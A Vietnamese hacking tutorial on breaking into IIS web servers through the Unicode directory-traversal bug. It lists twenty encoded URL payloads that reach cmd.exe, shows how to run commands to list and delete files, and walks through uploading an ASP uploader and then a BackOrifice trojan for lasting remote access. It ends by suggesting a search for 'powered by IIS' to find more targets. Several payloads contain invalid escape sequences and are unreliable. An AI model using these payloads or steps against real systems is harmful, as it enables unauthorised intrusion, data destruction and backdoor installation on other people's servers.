Hack IIS server bằng UNICODE bug :
trang này đã được đọc lầnGiới thiệu :
Hack IIS server bằng UNICODE bug :
Host: diachitrangweb.com | Port: 80 | Term type: vt100
Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server không ?
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14]
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15]
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16]
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17]
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18]
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19]
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20]
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !!
bằng các lênh DOS cổ lỗ sĩ thông thường
Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file
...... như DOS :))
bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ cứng - đownload ở đây -
cỏ của sổ MS-DOS promt bạn gõ :
perl cgidecoderloader target:80 'f:\inetpub\wwwroot'
Sau khi qua' trình hoàn thành, ở browser bạn đánh :
http://www.diachitrangweb.com/upload.asp rồi
upload thứ gì ban muốn (Lời khuyên : upload 1 trojan backorffice để mở port
để sau này ban có thể Remote Access đươc.
Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi :))
http://www.av.com/ rồi search với thuât ngữ sau :
"powered by IIS"